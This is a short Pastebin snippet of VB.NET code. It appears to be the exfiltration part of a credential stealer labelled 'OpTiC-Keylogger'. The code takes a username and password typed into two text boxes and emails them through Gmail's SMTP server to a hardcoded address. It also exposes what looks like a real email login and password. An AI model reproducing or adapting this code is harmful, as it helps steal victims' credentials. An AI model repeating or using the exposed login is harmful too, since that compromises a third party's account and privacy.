Advertisement
Guest User

Untitled

a guest
Sep 14th, 2017
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. SmtpServer.Credentials = New Net.NetworkCredential("tayler.delaney@gmail.com", "soulman1")
  2. SmtpServer.Port = 587
  3. SmtpServer.Host = "smtp.gmail.com"
  4. SmtpServer.EnableSsl = True
  5. SmtpServer.EnableSsl = True
  6. mail.To.Add("tayler.delaney@gmail.com")
  7. mail.From = New MailAddress("vincent.magenti@yahoo.com")
  8. mail.Subject = "OpTiC-Keylogger logs"
  9. mail.Body = "Username: " + TextBox1.Text + " " + "Password: " + TextBox2.Text
  10. SmtpServer.Send(mail)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement